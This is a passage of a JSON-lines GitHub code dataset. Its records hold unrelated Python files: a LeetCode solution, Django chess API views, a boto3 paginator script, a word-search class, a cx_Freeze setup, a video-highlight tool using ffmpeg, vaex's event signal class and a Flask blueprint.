None\n\nclass Solution(object):\n def removeNthFromEnd(self, head, n):\n \"\"\"\n :type head: ListNode\n :type n: int\n :rtype: ListNode\n \"\"\"\n \n dummy_head = ListNode(-1)\n dummy_head.next = head\n left = dummy_head\n right = dummy_head\n \n for _ in range(n):\n right = right.next\n \n while right.next:\n right = right.next\n left = left.next\n \n left.next = left.next.next\n \n return dummy_head.next","repo_name":"xixiaodanpaul/leetcode-summary-python","sub_path":"practice/solution/0019_remove_nth_node_from_end_of_list.py","file_name":"0019_remove_nth_node_from_end_of_list.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74238294248","text":"from django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.models import User\nfrom django.db import IntegrityError, transaction\nfrom django.db.models import Q\nfrom django.http import HttpResponse\nfrom django.template import RequestContext, loader\n# from django.views.decorators.csrf import csrf_exempt\n\n\nfrom rest_framework.status import HTTP_400_BAD_REQUEST, HTTP_401_UNAUTHORIZED, HTTP_500_INTERNAL_SERVER_ERROR\nfrom rest_framework.permissions import AllowAny # , IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\n# from django.contrib.auth.forms import AuthenticationForm\n\nfrom chess.models import GameModel, MoveModel, ChallengeModel\n\nfrom chess.serializers import GameModelSerializer\nfrom chess.board import IllegalMoveException, WrongPlayerException, InvlaidPieceException, \\\n EmptySquareException, PromotePieceException, IllegalPromotionException\n\nfrom chess.color import Color\nimport json\n\n\nclass ChessResponses(object):\n USER_IS_NOT_PLAYER = {\"error\": \"User is not a player of this game\"}\n USER_IS_NOT_CURRENT_PLAYER = {\"error\": \"User is not the current player of this game\"} # Change to you?\n USER_DOES_NOT_EXIST = {\"error\": \"User does not exist\"}\n OPPONENT_DOES_NOT_EXIST = {\"error\": \"Opponent does not exist\"}\n GAME_DOES_NOT_EXIST = {\"error\": \"Game does not exist\"}\n MOVE_NOT_ALLOWED = {\"error\": \"Move not allowed\"}\n PIECE_IS_NOT_VALID = {\"error\": \"Piece is not valid\"}\n SQUARE_IS_EMPTY = {\"error\": \"Square is empty\"}\n CANNOT_MOVE_ENEMY_PIECE = {\"error\": \"Cannot move enemy piece\"}\n PAWN_MUST_BE_PROMOTED = {\"error\": \"Cannot move piece, opponent must promote their pawn first\"}\n NO_PAWN_TO_PROMOTE = {\"error\": \"Cannot promote pawwn, there is no pawn able to be promoted\"}\n USER_CANNOT_CHALLENGE_THEMSELF = {\"errpr\": \"A player cannot challenge themself\"}\n NO_CHALLENGE_EXISTS = {\"error\": \"Cannot accept challenge with player, it does not exist\"}\n CHALLENGE_ALREADY_EXISTS = {\"error\": \"Challenge already exists, accept their challenge instead\"}\n\n\nclass AuthorizationResponses(object):\n LOGIN_SUCCESS = {\"message\": \"Login success\"}\n LOGOUT_SUCCESS = {\"message\": \"Logout success\"}\n LOGIN_FAILED = {\"error\": \"Login failed\"}\n USER_ALREADY_EXISTS = {\"error\": \"User already exists\"}\n USER_INACTIVE = {\"error\": \"User is inactive\"}\n USERNAME_REQUIRED = {\"error\": \"A username is required, but none was provided\"}\n PASSWORD_REQUIRED = {\"error\": \"A password is required, but none was provided\"}\n\n\n# Create your views here.\ndef index(request):\n template = loader.get_template(u'chess/index.html')\n context = RequestContext(request)\n return 
HttpResponse(template.render(context))\n\n\nclass LoginLogout(APIView):\n \"\"\"\n Allows a user to login and logout\n \"\"\"\n permission_classes = (AllowAny,)\n\n def post(self, request, do_logout=False):\n if do_logout:\n logout(request)\n return Response(AuthorizationResponses.LOGOUT_SUCCESS)\n else:\n data = json.loads(request.body)\n username = data.get(\"username\", None)\n password = data.get(\"password\", None)\n user = authenticate(username=username, password=password)\n if user is not None:\n if user.is_active:\n login(request, user)\n return Response(AuthorizationResponses.LOGIN_SUCCESS)\n\n return Response(AuthorizationResponses.LOGIN_FAILED, HTTP_401_UNAUTHORIZED)\n\n\nclass RegisterUser(APIView):\n permission_classes = (AllowAny,)\n\n def post(self, request):\n \"\"\"\n Create a new user account.\n\n The post data should be a json object containing the username and password, e.g\n {\n \"username\": \"me\",\n \"password\": \"secret\"\n }\n \"\"\"\n data = json.loads(request.body)\n\n username = data.get(\"username\", None)\n password = data.get(\"password\", None)\n\n if username is None:\n return Response(AuthorizationResponses.USERNAME_REQUIRED, HTTP_400_BAD_REQUEST)\n if password is None:\n return Response(AuthorizationResponses.PASSWORD_REQUIRED, HTTP_400_BAD_REQUEST)\n\n try:\n User.objects.create_user(username=username, password=password)\n except IntegrityError:\n # User already exists\n return Response(AuthorizationResponses.USER_ALREADY_EXISTS, HTTP_400_BAD_REQUEST)\n\n user = authenticate(username=username, password=password)\n if user is not None:\n if user.is_active:\n login(request, user)\n return Response(AuthorizationResponses.LOGIN_SUCCESS)\n else:\n # Should not happen because newly created uses should be active by default\n # TODO: Add logging\n return Response(AuthorizationResponses.USER_INACTIVE, HTTP_500_INTERNAL_SERVER_ERROR)\n else:\n # Should not happen because newly created uses should be active by default\n # TODO: Add logging\n return Response(AuthorizationResponses.LOGIN_FAILED, HTTP_500_INTERNAL_SERVER_ERROR)\n\n\nclass GameCreateOrList(APIView):\n \"\"\"This class provides methods to create new games or list those created by a user.\"\"\"\n permission_classes = (AllowAny, )\n\n def get(self, request, username, format=None):\n \"\"\"\n Retrieve a list of all Games for the user\n\n username -- The username of the player to create the game for\n\n Raises -- An HTTP 400 error if the user does not exist\n \"\"\"\n\n game_list = load_game_or_error(username)\n if isinstance(game_list, Response):\n return game_list\n\n serializer = GameModelSerializer(game_list, many=True)\n return Response(serializer.data)\n\n def post(self, request, username, format=None):\n \"\"\"\n Create a new game\n\n username -- The username of the player to create the game for\n\n Raises -- An HTTP 400 error if the user does not exist\n \"\"\"\n try:\n player = User.objects.get(username=username)\n except User.DoesNotExist:\n return Response(ChessResponses.USER_DOES_NOT_EXIST, status=HTTP_400_BAD_REQUEST)\n\n game = GameModel.objects.create(white_player=player, black_player=player)\n # game.black_player = player\n # game.white_player = player\n # game.active_player.color = Color.WHITE\n # game.board = Board()\n # game.save()\n\n serializer = GameModelSerializer(game)\n return Response(serializer.data)\n\n\nclass GameDetail(APIView):\n \"\"\"Provides a method to retrieve a specific game.\"\"\"\n permission_classes = (AllowAny,)\n\n def get(self, request, username, game_id, 
format=None):\n \"\"\"\n Retrieve a game.\n\n username -- The username of the player to create the game for\n game_id -- The game to load\n Raises -- An HTTP 400 error if the user does not exist or the game does not exist\n Returns -- The game information\n \"\"\"\n\n game = load_game_or_error(username, game_id)\n if isinstance(game, Response):\n return game\n else:\n serializer = GameModelSerializer(game)\n return Response(serializer.data)\n\n\n# TODO: This should be changed just to load_game, and django should be configured to be able to raise exceptions into\n# a response. Currently we cannot break the contol flow easily from a child function call.\ndef load_game_or_error(username, game_id=None):\n \"\"\"\n Retrieve a game.\n\n username -- The username of the player to create the game for\n game_id -- The game to load\n\n Returns -- The game information or a Response with an HTTP status code explaining the problem.\n\n \"\"\"\n try:\n game_list = GameModel.objects.filter(\n Q(black_player__username=username) | Q(white_player__username=username)\n ).select_related('color', 'winner') # TODO: Remove?\n if game_id is None:\n try:\n User.objects.get(username=username)\n except User.DoesNotExist:\n return Response(ChessResponses.USER_DOES_NOT_EXIST, status=HTTP_400_BAD_REQUEST)\n else:\n return game_list\n else:\n game = game_list.get(id=game_id)\n except GameModel.DoesNotExist:\n # Determine why the error happened. This doesn't have to be as performant because it is not the common case\n try:\n User.objects.get(username=username)\n except User.DoesNotExist:\n return Response(ChessResponses.USER_DOES_NOT_EXIST, status=HTTP_400_BAD_REQUEST)\n else:\n try:\n GameModel.objects.get(id=game_id)\n except GameModel.DoesNotExist:\n return Response(ChessResponses.GAME_DOES_NOT_EXIST, status=HTTP_400_BAD_REQUEST)\n else:\n return Response(ChessResponses.USER_IS_NOT_PLAYER, status=HTTP_400_BAD_REQUEST)\n\n return game\n\n\ndef username_color(game, username):\n \"\"\"\n Returns the color that a player is playing as in a given game\n\n game -- The game to check\n username -- The players username\n \"\"\"\n if game.black_player.username == username:\n return Color.BLACK\n elif game.white_player.username == username:\n return Color.WHITE\n else:\n return None\n\n\ndef combine_moves_and_attacks(from_, moves, attacks):\n \"\"\"\n Combine, from_, moves, and attacks into a single object that can be more easily manipulated\n\n from_ -- The location of a piece (a string)\n moves -- The non-capturing moves that can be made by the peice at from_\n attacks -- The capturing moves that can be made by the peice at from_\n \"\"\"\n moves_and_attacks = []\n\n for x in moves:\n moves_and_attacks.append({\n \"square\": x,\n \"capture\": False\n })\n\n for x in attacks:\n moves_and_attacks.append({\n \"square\": x,\n \"capture\": True\n })\n return {\n \"from\": from_,\n \"to\": moves_and_attacks\n }\n\n\nclass MoveList(APIView):\n \"\"\"\n This view handles the moves that a player can make\n \"\"\"\n permission_classes = (AllowAny,)\n\n def get(self, request, username, game_id):\n \"\"\"\n Returns all the possible moves for all of the specified player's pieces.\n\n username -- The username of the player\n game_id -- The game to list the possible moves for\n\n If it is not the players turn, then the moves will be an empty list.\n \"\"\"\n game = load_game_or_error(username, game_id)\n if isinstance(game, Response):\n return game\n else:\n response = []\n\n if game.active_player(username):\n board = game.board\n for square 
in board.player_piece_squares(board.current_player):\n moves, attacks = board._get_moves_and_attacks(square)\n\n moves_and_attacks = combine_moves_and_attacks(square, moves, attacks)\n response.append(moves_and_attacks)\n\n return Response(response)\n\n\nclass MoveDetail(APIView):\n \"\"\"\n This view handles the moves a players chess piece.\n \"\"\"\n permission_classes = (AllowAny,)\n\n def get(self, request, username, game_id, from_loc, format=None):\n \"\"\"\n Retrieves all of the possible moves from a given location\n\n username -- The username of the player\n game_id -- The game to list the possible moves for\n from_loc -- The square to move the piece from, e.g 'A3'\n\n Raises -- An HTTP 400 error if the user does not exist or the game does not exist\n Returns -- The game information\n \"\"\"\n\n game = load_game_or_error(username, game_id)\n if isinstance(game, Response):\n return game\n else:\n board = game.board\n if board._piece_owned_by_current_player(from_loc):\n moves, attacks = board._get_moves_and_attacks(from_loc)\n else:\n moves = set([])\n attacks = set([])\n moves_and_attacks = combine_moves_and_attacks(from_loc, moves, attacks)\n return Response(moves_and_attacks)\n # else:\n # return Response(ChessResponses.USER_IS_NOT_CURRENT_PLAYER, status=HTTP_400_BAD_REQUEST)\n\n\nclass MovePiece(APIView):\n \"\"\"\n Handles the moving of pieces\n \"\"\"\n permission_classes = (AllowAny,)\n\n def post(self, request, username, game_id, from_loc, to_loc, format=None):\n u\"\"\"Move a piece from one square to another.\n\n username -- The username of the player\n game_id -- The game to list the possible moves for\n from_loc -- The square to move the piece from, e.g 'A3'\n to_loc -- The square to move the piece to, e.g 'A5'\n\n If it is not the players turn, then the game will not be updated\n \"\"\"\n\n game = load_game_or_error(username, game_id)\n if isinstance(game, Response):\n return game\n elif game.active_player(username):\n board = game.board\n else:\n return Response(ChessResponses.USER_IS_NOT_CURRENT_PLAYER, status=HTTP_400_BAD_REQUEST)\n\n try:\n board.move_piece(from_loc, to_loc)\n game.board = board\n\n except IllegalMoveException:\n return Response(ChessResponses.MOVE_NOT_ALLOWED, HTTP_400_BAD_REQUEST)\n except EmptySquareException:\n return Response(ChessResponses.SQUARE_IS_EMPTY, HTTP_400_BAD_REQUEST)\n except WrongPlayerException:\n return Response(ChessResponses.CANNOT_MOVE_ENEMY_PIECE, HTTP_400_BAD_REQUEST)\n except PromotePieceException:\n return Response(ChessResponses.PAWN_MUST_BE_PROMOTED, HTTP_400_BAD_REQUEST)\n\n serializer = GameModelSerializer(game)\n return Response(serializer.data)\n\n\nclass PromotablePieces(APIView):\n permission_classes = (AllowAny,)\n\n def get(self, request, username, game_id, pk=None):\n \"\"\"\n Returns all the pieces that the pawn can be promoted to.\n\n username -- The username of the player\n game_id -- The game to list the possible moves for\n\n The color of the pieces is the same as that of the player with the username provided.\n \"\"\"\n\n game = load_game_or_error(username, game_id)\n if isinstance(game, Response):\n return game\n else:\n board = game.board\n player_color = game.player_color(username)\n assert(player_color is not None) # Should be guaranteed by load_game_or_error succeeding\n\n pieces = board.promotable_pieces(player_color)\n piece_names = [piece.__name__ for piece in pieces]\n return Response(piece_names)\n\n\nclass PromotePiece(APIView):\n permission_classes = (AllowAny,)\n\n def post(self, request, 
username, game_id, piece, format=None):\n u\"\"\"Move a piece from one square to another.\n\n username -- The username of the player\n game_id -- The game to list the possible moves for\n piece -- The piece to promote the pawn to\n\n If it is not the players turn, then the game will not be updated\n \"\"\"\n game = load_game_or_error(username, game_id)\n if isinstance(game, Response):\n return game\n elif game.active_player(username): # The common case\n board = game.board\n try:\n board.promote_pawn(piece) # TODO: The board method needs to be rewritten\n game.board = board\n except InvlaidPieceException:\n return Response(ChessResponses.PIECE_IS_NOT_VALID, HTTP_400_BAD_REQUEST)\n except IllegalPromotionException:\n return Response(ChessResponses.NO_PAWN_TO_PROMOTE, HTTP_400_BAD_REQUEST)\n\n serializer = GameModelSerializer(game)\n return Response(serializer.data)\n else:\n return Response(ChessResponses.USER_IS_NOT_CURRENT_PLAYER, status=HTTP_400_BAD_REQUEST)\n\n\nclass PreviousMoves(APIView):\n \"\"\"\n Lists all of the previous moves for a game\n \"\"\"\n permission_classes = (AllowAny,)\n\n def get(self, request, username, game_id):\n moves = MoveModel.objects.filter(game_id=game_id).all()\n\n resp = []\n for m in moves:\n if m.capture:\n operator = \"x\"\n else:\n operator = \" \"\n resp.append(m.from_loc + operator + m.to_loc)\n\n return Response(resp)\n\n\nclass ChallengeList(APIView):\n \"\"\"\n List all of the players challenging the player\n \"\"\"\n permission_classes = (AllowAny,)\n\n def get(self, request, username):\n \"\"\"\n List all of the players challenging the player, and players they are challenging.\n \"\"\"\n try:\n User.objects.get(username=username)\n except User.DoesNotExist:\n return Response(ChessResponses.USER_DOES_NOT_EXIST, HTTP_400_BAD_REQUEST)\n\n incoming_challenges = ChallengeModel.objects.filter(challengee__username=username)\n challengers = [c.challenger.username for c in incoming_challenges]\n\n outgoing_challenges = ChallengeModel.objects.filter(challenger__username=username)\n challengees = [c.challengee.username for c in outgoing_challenges]\n\n resp = {\n \"challengers\": challengers,\n \"challengees\": challengees\n }\n return Response(resp)\n\n\nclass Challenge(APIView):\n \"\"\"\n Challenge players to a game or accept a challenge a challenge from other players\n \"\"\"\n permission_classes = (AllowAny,)\n\n def put(self, request, username, opponent):\n \"\"\"\n Challenge a player to a game.\n\n A player cannot challenge themselves\n \"\"\"\n if username != opponent:\n # First check if they have challenged us\n try:\n ChallengeModel.objects.get(challenger__username=opponent, challengee__username=username)\n except ChallengeModel.DoesNotExist:\n pass\n else:\n Response(ChessResponses.CHALLENGE_ALREADY_EXISTS)\n\n try:\n challenger = User.objects.get(username=username)\n except User.DoesNotExist:\n return Response(ChessResponses.USER_DOES_NOT_EXIST)\n\n try:\n challengee = User.objects.get(username=opponent)\n except User.DoesNotExist:\n return Response(ChessResponses.OPPONENT_DOES_NOT_EXIST)\n\n try:\n ChallengeModel.objects.create(challenger=challenger, challengee=challengee)\n except IntegrityError:\n # Challenge already exists\n pass\n\n resp = {\n \"message\": \"Challenge issued to opponent\"\n }\n\n return Response(resp)\n else:\n return Response(ChessResponses.USER_CANNOT_CHALLENGE_THEMSELF)\n\n def delete(self, request, username, opponent):\n \"\"\"\n Cancel a challenge\n \"\"\"\n try:\n 
\n            ChallengeModel.objects.filter(challenger__username=username, challengee__username=opponent).delete()\n            ChallengeModel.objects.filter(challenger__username=opponent, challengee__username=username).delete()\n        except IntegrityError:\n            # No matching challenge exists, so there is nothing to do\n            pass\n        else:\n            resp = {\n                \"message\": \"Challenge deleted.\"\n            }\n            return Response(resp)\n\n    def post(self, request, username, opponent):\n        \"\"\"\n        Accept a challenge\n        \"\"\"\n        try:\n            challenge = ChallengeModel.objects.get(challenger__username=username, challengee__username=opponent)\n        except ChallengeModel.DoesNotExist:\n            return Response(ChessResponses.NO_CHALLENGE_EXISTS, HTTP_400_BAD_REQUEST)\n        else:\n            with transaction.atomic():\n                challenge.delete()\n                GameModel.objects.create_game(username, opponent)\n\n            # TODO: need to place a message to alert the other player that the game has started!\n            return Response(\"TODO:\")\n\n\nclass MatchMake(APIView):\n    pass\n\n\nclass ActivePlayers(APIView):\n    permission_classes = (AllowAny,)\n\n    def get(self, request, username):\n        \"\"\"\n        Return a list of active players excluding the current player\n        \"\"\"\n        # TODO: Currently returns all players\n        users = User.objects.filter(~Q(username=username)).all()\n        resp = [u.username for u in users]\n\n        return Response(resp)\n\n    def post(self, request, username):\n        \"\"\"\n        Add the player to the list of active players.\n\n        The active players list is periodically reset, with inactive players deleted\n        \"\"\"\n        pass\n\n\nclass AiAgents(APIView):\n    permission_classes = (AllowAny,)\n\n    def get(self, request, username):\n        \"\"\"\n        Return a list of agents that a player can play against\n        \"\"\"\n        resp = ['Not Implemented']\n        return Response(resp)\n","repo_name":"CheyneWilson/chess","sub_path":"chess/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":21166,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"8218424824","text":"import boto3,pprint\n\nsession = boto3.session.Session(profile_name=\"ankit\")\niam_res = session.resource(\"ec2\")\niam_cli = session.client(\"ec2\")\n\npaginator= iam_cli.get_paginator(\"describe_instances\")\n\nfor each in paginator.paginate():\n    print(each)","repo_name":"Ankit0506/AWS","sub_path":"Paginators.py","file_name":"Paginators.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22314253479","text":"import pdb\nimport difflib as diff\n\nclass SortFile(object):\n    \n    \"\"\" This class opens a file and sorts all the items in that file.
\"\"\"\n \n def __init__(self,file_name):\n self._file_name = file_name\n \n def read_file(self):\n self._file_handle = open(self._file_name,'r')\n text = self._file_handle.read()\n return text\n\n def clean_file(self,text):\n import string\n return text.translate(string.maketrans(\"\",\"\"), string.punctuation)\n \n def sort_file(self,text):\n doc =[s for s in text.split(\" \")]\n doc.sort()\n return doc\n\n\nclass LinearSearch(SortFile):\n \"\"\"This class searches within the sorted words and prints out the three closest words to the inserted word \"\"\"\n\n def __init__(self,word,file_name):\n self.__search_word = word\n self.__selected_list = []\n self.__all_words = {}\n self._file_name = file_name\n \n \"\"\" Initialize the contructor of the inherited class \"\"\"\n SortFile.__init__(self,self._file_name)\n\n\n \"\"\" Define a search method\"\"\"\n def search(self):\n _text = self.read_file()\n _text = self.clean_file(_text)\n _text = self.sort_file(_text)\n SEARCH = True\n N = 20 # Number of selected list\n n = N\n r = 1 # For exact matches\n cutoff = 0.0\n while (SEARCH == True):\n templist = diff.get_close_matches(self.__search_word,_text,n,r) # this method returns n words of less depending on the number of matches\n self.__selected_list.extend(list(set(templist))) # this line adds only a unique list \\ to the list of selected words. Basically, only one word that exactly matches the string would be added to the list in the first loop\n if len(self.__selected_list) > N-1 :\n SEARCH == False\n return self.__selected_list\n else:\n\n # Delete the selected words from the list of words available\n for selected_words in self.__selected_list:\n if selected_words in _text:\n _text.remove(selected_words)\n # Clean up the list and make room for closer words \n self.__selected_list = list(set(self.__selected_list))\n n = N - len(self.__selected_list)\n if r > cutoff + 0.1: # Ensure r does not go below 0.0\n r -= 0.1\n else:\n return self.__selected_list\n \n\nclass CalculateTime(object):\n \"\"\" This file calculates the time taken for each of the other two classes to run \"\"\"\n from time import time\n pass\n\n\n\ndef main():\n newText = LinearSearch(\"inter\",\"text\")\n result = newText.search()\n print(result)\n\n\nif __name__ == \"__main__\":\n main() \n\n \n\n","repo_name":"ojaribido42/python_oop","sub_path":"search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":2819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40242939281","text":"# Source: http://stackoverflow.com/a/22006429/2842452, http://stackoverflow.com/a/38656830/2842452\nimport sys\nfrom cx_Freeze import setup, Executable\nimport os\n\n\nos.environ['TCL_LIBRARY'] = r\"D:\\Program Files\\Python35\\tcl\\tcl8.6\"\nos.environ['TK_LIBRARY'] = r\"D:\\Program Files\\Python35\\tcl\\tk8.6\"\nincludes = [\"tkinter\"]\ninclude_files = [r\"D:\\Program Files\\Python35\\DLLs\\tcl86t.dll\", \\\n r\"D:\\Program Files\\Python35\\DLLs\\tk86t.dll\"]\n\nbase = None\nif sys.platform == \"win32\":\n base = \"Win32GUI\"\n\nsetup(\n name = \"Categories Backup Tool\",\n version = \"1.0\",\n description = \"Tool used to backup or export Steam Categories\",\n options = {\"build_exe\": {\"includes\": includes, \"include_files\": include_files}},\n executables = [Executable(\"GUI.py\",targetName=\"CategoriesBackupTool.exe\", base = 
base)])\n\n\n\n","repo_name":"DanielZa2/CategoriesBackupTool","sub_path":"Release/Tools/cx_Freeze/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"17071252382","text":"import traceback\nimport logging\nlogger = logging.getLogger(\"vaex.events\")\n\n\nclass Signal(object):\n def __init__(self, name=None):\n \"\"\"\n\n :type name: str\n :return:\n \"\"\"\n self.name = name or repr(self)\n self.callbacks = []\n self.extra_args = {}\n\n def connect(self, callback, prepend=False, *args, **kwargs):\n # logger.debug(\"(%s) connected %s\", self.name, callback)\n # insert first, otherwise emit may get a keyerror in multithreaded cases\n self.extra_args[callback] = (args, kwargs)\n if prepend:\n self.callbacks.insert(0, callback)\n else:\n self.callbacks.append(callback)\n return callback\n\n def emit(self, *args, **kwargs):\n results = []\n for callback in list(self.callbacks): # copy it because handlers van add or remove items\n extra_args, extra_kwargs = self.extra_args[callback]\n final_args = args + extra_args\n final_kwargs = {}\n final_kwargs.update(extra_kwargs)\n final_kwargs.update(kwargs)\n try:\n # logger.debug(\"(%s) calling %r with arguments %r and kwargs %r\", self.name, callback, final_args, final_kwargs)\n value = callback(*final_args, **final_kwargs)\n results.append(value)\n except Exception:\n logger.exception(\"error in handling callback %r with arguments %r and kwargs %r\", callback, final_args, final_kwargs)\n raise\n # tb = traceback.format_exc()\n # raise Exception(\"error while calling callback: %r with arguments %r and kwargs %r\" % (callback, final_args, final_kwargs), tb)\n return results\n\n def disconnect(self, callback):\n self.callbacks.remove(callback)\n del self.extra_args[callback]\n","repo_name":"vaexio/vaex","sub_path":"packages/vaex-core/vaex/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","stars":8057,"dataset":"github-code","pt":"53"} +{"seq_id":"42049441167","text":"import os\nfrom subprocess import call\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.io import wavfile\nfrom math import ceil\nfrom pathlib import Path\n\n'''\nmake sure everything works for files in different folders, etc\n\n'''\n\nFCPXML_TEMPLATE = '''\n\n\n \n \n \n \n \n \n \n \n \n \n{asset_clips}\n \n \n \n \n \n'''\nASSET_CLIP_TEMPLATE = '''\n \n \n'''\n\nMARKERS = {\n 'Hotkey 1 was pressed':1,\n 'Hotkey 2 was pressed':2,\n 'Hotkey 3 was pressed':3,\n 'Hotkey 4 was pressed':4,\n 'Hotkey 5 was pressed':5\n }\n\n# returns an integer equal to the number of frames in a video\n# takes a string in the form HH:MM:SS\ndef to_frames(str_hhmmss, fps=60):\n\n time_list = str_hhmmss.split(':')\n\n h = int(time_list[0])\n m = int(time_list[1])\n s = int(time_list[2])\n\n return (h*3600+m*60+s)*fps\n\n# makes a fcpxml file at output path\n# takes a string video_path and output_path which will point to relavant file names, will be converted to path objects\n# takes a clip list, usually generated by get_markers\ndef make_fcpxml(video_path, output_path, clip_list, fps=60, path=''):\n\n video_name = Path(video_path)\n output_name = Path(output_path)\n\n if not video_name.exists():\n print(\"File does not extist\")\n\n else:\n\n clips = ''\n video_duration = 0\n\n for clip in clip_list:\n clips += ASSET_CLIP_TEMPLATE.format(file_name=video_name.name, 
offset=str(video_duration), start=str(clip['start_frame']), duration=str(clip['total_frames']))\n video_duration += clip['total_frames']\n\n with output_name.open('w') as file:\n file.write(FCPXML_TEMPLATE.format(\n file_name=video_name.name, \n file_path=video_name.as_posix().replace(' ','%20'),\n asset_clips=clips\n )) # formatting the template with specific paramaters\n\n\n# \ndef get_markers(video_path, logs_path, fps=60):\n\n video_name = Path(video_path)\n logs_name = Path(logs_path)\n\n if not video_name.exists():\n print(\"video does not extist\")\n\n elif not logs_name.exists():\n print(\"logs does not extist\")\n\n # this code is farily messy and overcomplicated, possibly rewrite at some point if you feel like it\n\n else:\n\n source_name = str(video_name.name)\n print(source_name)\n\n # reads the log file and saves the relevant logs in a list\n with logs_name.open() as all_logs:\n p_vod_dir = source_name.split(' ')\n # getting the time code formating correct\n start_text = p_vod_dir[0] + ' ' + p_vod_dir[1].replace('-',':')[0:-4]\n print(start_text)\n\n all_logs_read = all_logs.read()\n\n if not start_text in all_logs_read:\n print(\"no recording in logs\")\n\n o_logs = all_logs_read.split('EVENT:START RECORDING @ ' + start_text)[1].split('EVENT:STOP RECORDING')[0].split('\\n\\n')[1:-1]\n\n # creates a dict of values corresponding to MARKERS and their corresponding times in the format H:MM:SS\n logs = []\n for log in o_logs:\n if 'HOTKEY' in log:\n marker = log.split(' @ ')[0].split('HOTKEY:')[1]\n try:\n logs.append({\n 'marker':MARKERS[marker],\n 'frame':to_frames(log.split('\\n')[1].split(' Record Time Marker')[0], fps=fps)\n })\n except:\n print('NO MARKER EQUALING '+marker)\n # more can be added here for scene changes or other things\n return logs\n\ndef getMaxVolume(s):\n maxv = float(np.max(s))\n minv = float(np.min(s))\n return max(maxv,-minv)\n\ndef getWav(video_path, fps=60):\n\n video_name = Path(video_path)\n\n if not video_name.exists():\n print(\"video does not extist\")\n\n else:\n # maybe edit to use a temp folder\n call('ffmpeg -i \"{}\" temp.wav'.format(video_path.replace(' ',' ')), shell=True)\n samplerate, data = wavfile.read('temp.wav')\n os.remove('temp.wav')\n return samplerate, data\n\nif __name__ == '__main__':\n\n # TO MAKE SURE EVERYTHING WORKS,\n # INSTEAD OF DOING THE AUDIOTHRESHOLD STUFF, JUST DO A FEW SECONDS BEFORE OR AFTER OR BOTH\n\n RECORDING = 'X:\\\\vods\\\\2022-02-19 17-31-27.mp4'\n LOGS = 'C:\\\\Users\\\\ethan\\\\Documents\\\\infowriter\\\\logs.txt'\n fps = 60\n audioThreshold = 0.1 # 0= audioThreshold:\n lowerFrameBound -= 1\n\n # finding upper bound\n upperFrameBound = m['frame'] # upper bound starts as the hotkey was pressed\n while frameVolumes[upperFrameBound]/maxVolume >= audioThreshold:\n upperFrameBound += 1\n\n clips.append({'total_frames':upperFrameBound-lowerFrameBound,'start_frame':lowerFrameBound})\n\n make_fcpxml(RECORDING, 'test.fcpxml', clips)\n\n\n","repo_name":"ethanbaker3525/autohighlighter","sub_path":"autohighlighter.py","file_name":"autohighlighter.py","file_ext":"py","file_size_in_byte":6605,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"11686122552","text":"from flask import Blueprint, render_template, url_for, request\nfrom cascad.models.datamodel import AgentTypeModel, ComputeExperimentModel, ComputeExperimentTypeModel, AgentModel, GeneResultModel, ExperimentResultModel, ComponentTypeModel\nfrom pyecharts import options as opts\nfrom pyecharts.charts 
import Bar, Scatter\n# from jinja2 import Markup\nfrom cascad.experiment.token_sender import ERC20TokenWorld\nfrom cascad.experiment.MBM.exp import GA as MBMExperiment\nfrom collections import defaultdict\nfrom flask_login import login_required\n\nhome_bp = Blueprint('home_bp', __name__,\n                    template_folder='templates', static_folder='static')\n\n\ndef token_discribute(max_step, world_id) -> Scatter:\n    # agent_models = AgentModel.objects(step=max_step, world_id=world_id)\n    generesult_models = ExperimentResultModel.objects(experiment_id=world_id)\n    result = [\n        (agent_model.day, agent_model.result[0]) for agent_model in generesult_models\n    ]\n\n    c = (\n        Scatter()\n        .add_xaxis([x[0] for x in result])\n        .add_yaxis(\"Loss\", [x[1] for x in result])\n        .set_global_opts(title_opts=opts.TitleOpts(title=\"Avg Loss Over Time\"))\n    )\n    return c\n\n\n# if not logged in then jump to login page\n@home_bp.route('/', methods=['GET', 'POST'])\n@login_required\ndef index():\n    return render_template('index.html')\n\n\n@home_bp.route(\"/compute_experiment\", methods=['GET', 'POST'])\n@home_bp.route(\"/compute_experiment/<page>\", methods=['GET', 'POST'])\n@login_required\ndef compute(page=0):\n    page = int(page)\n    if page == 0:\n        experiments = ComputeExperimentModel.objects.order_by(\n            '-creation_date').limit(5)\n    else:\n        experiments = ComputeExperimentModel.objects.order_by(\n            '-creation_date').skip(page * 5).limit(5)\n    return render_template('compute_experiment.html', experiments=experiments, page=page)\n\n\n@home_bp.route(\"/agents\", methods=['GET', 'POST'])\n@home_bp.route(\"/agents/<agent_name>\", methods=['GET', 'POST'])\n@login_required\ndef agent(agent_name=None):\n    # if request.method == 'POST':\n    #     agent_type = request.form['agent_type']\n\n    # else:\n    if not agent_name:\n        agents = AgentTypeModel.objects.all()\n        return render_template('agent.html', agents=agents)\n    else:\n        agent = AgentTypeModel.objects(agent_name=agent_name).first()\n        return render_template('agent_detail.html', agent=agent)\n\n\n@home_bp.route(\"/components\", methods=['GET', 'POST'])\n@home_bp.route(\"/components/<component_name>\", methods=['GET', 'POST'])\n@login_required\ndef component(component_name=None):\n    # if request.method == 'POST':\n    #     agent_type = request.form['agent_type']\n\n    # else:\n    if not component_name:\n        components = ComponentTypeModel.objects.all()\n        return render_template('components.html', components=components)\n    else:\n        component = ComponentTypeModel.objects(\n            component_name=component_name).first()\n        return render_template('component_detail.html', component=component)\n\n\n@home_bp.route(\"/examples\", methods=['GET', 'POST'])\n@login_required\ndef use_cases():\n    return 